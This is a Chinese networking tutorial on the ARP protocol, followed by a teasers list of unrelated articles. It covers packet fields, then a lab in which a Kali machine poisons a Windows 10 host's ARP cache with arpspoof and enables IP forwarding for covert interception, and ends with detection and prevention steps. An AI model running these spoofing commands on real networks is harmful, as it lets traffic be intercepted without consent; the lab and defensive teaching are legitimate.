网络层协议-ARP协议

网络层协议-ARP协议

1)概述

ARP:地址解析协议,作用:根据IP地址查询MAC地址

数据包发送前需要进行封包,在数据链路层需要封装源mac地址是自己的mac,目的mac地址是别人,但是不知道别人的mac地址,此时需要由arp协议获取mac地址

ARP分别请求包和响应包

2)ARP工作机制

image-20240830100752748

1.首先A主机需要对ARP协议封包,ARP协议(源IP地址:自己,目的IP地址:手动填写,源mac地址自己,目的mac地址填充地址)
2.以太网协议封包,源mac是自己,目的mac:广播地址(ff-ff)
3.发送出去
4.交换机识别到数据帧,查看mac头部,目的mac是广播,所以广播出去
5.C主机查看mac头,查看arp协议,目的IP不是自己,丢弃
6.B主机查看mac头,查看arp协议,目的IP是自己,封装回包
7.B主机封装arp协议,源mac自己,目的mac对方,源IP地址自己,目的IP地址对方
8.以太网协议封装,源mac自己,目的mac对方
9.交换机收到arp响应后,查看mac头,目的mac在自身缓存表,所以进行单播出去

image-20240830101914904

ARP数据包会经过交换机,但是不会经过路由器,属于局域网协议

3)ARP协议字段分析

ARP请求包
Hardware type: Ethernet (1)   硬件类型:以太网
Protocol type: IPv4 (0x0800)  协议类型:ipv4
Hardware size: 6              硬件大小
Protocol size: 4              协议大小
Opcode: request (1)			  操作码:1表示请求 2表示响应
Sender MAC address: Intel_26:1f:29 (60:57:18:26:1f:29)		源mac地址
Sender IP address: 192.168.2.89								源IP地址
Target MAC address: 00:00:00_00:00:00 (00:00:00:00:00:00)	目的mac地址
Target IP address: 192.168.2.1								目的IP地址

ARP响应包
Hardware type: Ethernet (1)   硬件类型:以太网
Protocol type: IPv4 (0x0800)  协议类型:ipv4
Hardware size: 6              硬件大小
Protocol size: 4              协议大小
Opcode: reply (2)             操作码:1表示请求 2表示响应
Sender MAC address: RuijieNetwor_e9:45:11 (80:05:88:e9:45:11)
Sender IP address: 192.168.2.1
Target MAC address: Intel_26:1f:29 (60:57:18:26:1f:29)
Target IP address: 192.168.2.89

主机拿到对方的MAC地址后,缓存在自身的MAC表里,下次就直接从MAC表里拿对方的MAC地址

4)ARP攻击

image-20240830112250158

准备:
1台window10 作为靶机
1台kali 作为攻击者

image-20240830112800286

kali开始实施攻击
1.kali下载名令dsniff
apt-get install dsniff

2.实施攻击
arpspoof -i 接口名称 -t 目标IP地址 -r 网关IP地址

arpspoof -i 接口名称 -t win10IP地址 -r 网关IP地址

ip a  查看的是eth0网卡名称

arpspoof -i eth0 -t 192.168.159.131 -r 192.168.159.2

image-20240830113727390

通过抓包发现,kali发送了2种响应包,一个是攻击目标主机的,一个是攻击网关的,对象不一样

win10被攻击者前显示的mac表

C:\Users\zhangsan>arp -a

接口: 192.168.159.131 --- 0x3
  Internet 地址         物理地址              类型
  192.168.159.2         00-50-56-e9-9e-0a     动态
  192.168.159.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

win10被攻击者后显示的mac表

C:\Users\zhangsan>arp -a

接口: 192.168.159.131 --- 0x3
  Internet 地址         物理地址              类型
  192.168.159.2         00-0c-29-be-f2-73     动态
  192.168.159.132       00-0c-29-be-f2-73     动态
  192.168.159.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

5)ARP欺骗

使用ARP攻击靶机会立马让靶机警觉,可能靶机会去检查网络是否故障,容易发现被攻击,使用arp欺骗更具有隐蔽性

ARP欺骗在的原理是在ARP攻击基础上,让攻击者进行转发数据给路由器,做到神不知鬼不觉的监控靶机

在kali上有一个配置文件,修改配置问价即可实现数据转发,配置文件路径在/proc/sys/net/ipv4/ip_forward

echo 1 >> /proc/sys/net/ipv4/ip_forward    修改该配置文件内容为1

攻击者在使用arpspoof攻击命令可以让靶机受到攻击的同时根本感受不到遭受攻击

image-20240830143321380

6)ARP研判

使用tracert命令查看下一条路由器IP地址
正常如下
C:\Users\Administrator>tracert 192.168.2.1

通过最多 30 个跃点跟踪到 192.168.2.1 的路由

  1     2 ms     1 ms     1 ms  192.168.2.1

跟踪完成。

被攻击如下
C:\Users\Administrator>tracert 192.168.159.2

通过最多 30 个跃点跟踪到 192.168.159.2 的路由

  1    <1 毫秒    *        *     192.168.159.132
  2    <1 毫秒   <1 毫秒   <1 毫秒 192.168.159.2

跟踪完成。

发现路由器是第二跳IP地址,说明遭受到攻击

arp -a查看mac地址是否有一样的,但是IP地址不一样,说明遭受到攻击
C:\Users\Administrator>arp -a

接口: 192.168.159.131 --- 0x3
  Internet 地址         物理地址              类型
  192.168.159.2         00-0c-29-be-f2-73     动态
  192.168.159.132       00-0c-29-be-f2-73     动态
  192.168.159.254       00-50-56-ee-26-2f     动态
  192.168.159.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

7)ARP防范

1.在使用者电脑上安装360ARP防火墙

2.设置交换机上端口安全功能

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/873711.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

基于VUE的校园二手物品交易管理系统的设计与实现 (含源码+sql+视频导入教程)

&#x1f449;文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1 、功能描述 基于VUE的校园二手物品交易管理系统8拥有两种角色 管理员&#xff1a;闲置物品管理、订单管理、用户管理 用户&#xff1a;登录注册、购物车、发布闲置物品、评论、发货、收货地址管理等…

AI在医学领域:MIL回归用于前列腺癌复发预测

2024年&#xff0c;全球男性新癌症病例预计为1029080例&#xff0c;其中前列腺癌病例预计为29%。前列腺癌是男性中第二常见的癌症类型&#xff0c;仅次于肺癌。它主要影响老年男性&#xff0c;且发病率随年龄增长而增加。前列腺癌的主要治疗方法是前列腺切除术&#xff0c;但术…

探索手势能够识别在训练数据中未观察到的情绪

介绍 论文地址&#xff1a;https://arxiv.org/pdf/2202.10571.pdf 基于人工智能的情感识别研究领域是各个领域不可或缺的&#xff0c;如机器人和情感计算&#xff0c;并在语音中使用面部表情和手势来实现人们提出了各种方法来识别一个人的情绪。然而&#xff0c;这些基于机器学…

C语言 | Leetcode C语言题解之第391题完美矩形

题目&#xff1a; 题解&#xff1a; /* 参照官方答案题解&#xff1a; 1.小矩形面积之和等于大矩形区域面积 2.矩形区域内部顶点出现次数只能是2次或4次&#xff08;边界四个顶点只能出现一次&#xff09; */ typedef struct {int x;int y; } Coordinate;typedef struct {Coor…

JavaWeb(后端)

Spring-MVC Spring MVC&#xff08;Model-View-Controller&#xff09;是Spring框架中的一个模块&#xff0c;用于构建基于MVC设计模式的Web应用程序。Spring MVC将应用程序分为三个主要部分&#xff1a; Model&#xff1a;负责处理数据和业务逻辑。View&#xff1a;负责展示…

Rancher 与 Kubernetes(K8s)的关系

1. 简介 1.1 Kubernetes 作为容器编排平台 Kubernetes 是一个开源平台&#xff0c;用于自动化部署、扩展和管理容器化的应用。它提供了容器调度、自动伸缩、健康检查、滚动更新等功能。 例子&#xff1a;假设您有一个微服务架构的应用程序&#xff0c;需要运行在多个节…

单例的饿汉式,懒汉式的线程安全问题

1 单例的饿汉式 对象在类加载的时候就创建了&#xff0c;线程安全&#xff0c;速度块&#xff0c;但是浪费空间&#xff0c; public class Hungry {//唯一对象private static final Hungry HUNGRY new Hungry();byte byte1[]new byte[1024];byte byte2[]new byte[1024];byte…

openSSL 如何降版本

文章目录 前言openSSL 如何降版本1. 卸载2. 安装新的openssl版本3. 验证 前言 如果您觉得有用的话&#xff0c;记得给博主点个赞&#xff0c;评论&#xff0c;收藏一键三连啊&#xff0c;写作不易啊^ _ ^。   而且听说点赞的人每天的运气都不会太差&#xff0c;实在白嫖的话&…

DDS-数据分发服务

目录 1.ROS2架构 2.DDS概念 参考资料 1.ROS2架构 在ROS 2&#xff08;Robot Operating System 2&#xff09;中&#xff0c;系统通常由以下几个核心部分组成&#xff0c;它们共同构成了ROS 2的架构和功能&#xff1a; Plumbing&#xff08;管道&#xff09;: 这个术语在ROS …

Oracle OCP认证值得考吗? 需要门槛吗?

随着数据量的爆炸性增长和企业对数据依赖性的提升&#xff0c;对数据库专业人士的需求也在不断上升。OCP认证&#xff0c;作为Oracle公司提供的权威认证之一&#xff0c;长期以来被视为数据库专业人士技能和知识水平的重要标志。 但随着技术的发展和认证种类的增多&#xff0c;…

快速解决git am冲突

前言 当希望通过git am xxxx.patch&#xff0c;添加一些代码修改&#xff0c;如果代码版本相差较大&#xff0c;就可能产生冲突。 这种必须要我们手动修改冲突内容。 解决过程 1. git am 尝试打入patch补丁 git am 0004-patch.patch2. git apply --reject生成冲突文件 执行…

uniapp设置微信小程序的交互反馈

链接&#xff1a;uni.showToast(OBJECT) | uni-app官网 (dcloud.net.cn) 设置操作成功的弹窗&#xff1a; title是我们弹窗提示的文字 showToast是我们在加载的时候进入就会弹出的提示。 2.设置失败的提示窗口和标签 icon&#xff1a;error是设置我们失败的logo 设置的文字上…

keil安装及运行第一个stm32程序

前言 记录如何安装keil软件及运行第一个stm32程序 目录 一、keil开发环境搭建 0.keil是什么 1.keil下载 2.keil软件安装 3.安装芯片支持包 4.破解激活 二、keil工程结构 1.创建目录结构 2.新建工程 3.配置项目 (1).例程准备 (2).工程目录管理 (3).选项配置 4.例…

渗透测试学习资源

burp学院 https://portswigger.net/burp/documentation/desktop/getting-started https://portswigger.net/web-security/ hacker101学院 https://www.hacker101.com/ https://github.com/bugcrowd/bugcrowd_university 如何白嫖自学网络安全技术&#xff0c;最稳最推荐的网…

CGAL 概念模型及Traits 概述

CGAL 概念模型及Traits 本节释了概念Concepts 、模型Models以及Traits类的含义。 CGAL Concepts and Models 概念Concepts是对类型的一组要求&#xff0c;即它具有特定的嵌套类型、特定的成员函数或具有特定的以该类型为参数的自由函数。概念的模型 Models是一个满足概念需求…

购买磨轮平衡机时应该注意什么问题和技巧

在购买磨轮平衡机时&#xff0c;您应该注意以下几个关键点&#xff1a; 平衡精度 平衡精度是衡量平衡机性能的核心指标&#xff0c;直接影响到不平衡量的检测与校准的准确性&#xff0c;从而决定磨轮的振动和噪声水平。高精度的平衡机能显著减少振动和噪声&#xff0c;提高磨…

IEEE投稿模板翻译

>将这一行替换为您的稿件id号(双击此处编辑)< IEEE 期刊和会议论文的撰写准备&#xff08;2022&#xff09; 第一作者 A. 作者&#xff0c;IEEE成员&#xff0c;第二作者 B. 作者&#xff0c;第三作者 C. 作者 Jr.&#xff0c;IEEE成员 摘要—本文档为IEEE会刊、期刊和…

推荐一个Python流式JSON处理模块:streaming-json-py

每天&#xff0c;我们的设备、应用程序和服务都在生成大量的数据流&#xff0c;这些数据往往大多是以JSON格式存在的。 如何高效地解析和处理这些JSON数据流是一大挑战。今天&#xff0c;我要为大家介绍一个能极大简化这一过程的利器&#xff1a;streaming-json-py streaming…

负载均衡调度器--LVS

文章目录 集群和分布式集群分布式 LVS介绍LVS特点LVS工作原理LVS集群架构 LVS集群中的术语CIPVIPRSDIPRIP LVS集群的工作模式NAT模式DR模式DR的工作原理DR的特点:DR的网络配置1.配置负载均衡器2.配置后端服务器lo接口的作用 3.测试连接&#xff1a; DR的典型应用场景 TUN模式 L…

新电脑Win11系统想要降级为Win10怎么操作?

前言 现在的电脑大部分都是Windows 11系统&#xff0c;组装机还好一些&#xff0c;如果想要使用Windows 10&#xff0c;只需要在安装系统的时候选择Windows 10镜像即可。 但是对于新笔记本、厂商的成品机、一体机来说&#xff0c;只要是全新的电脑&#xff0c;基本上都是Wind…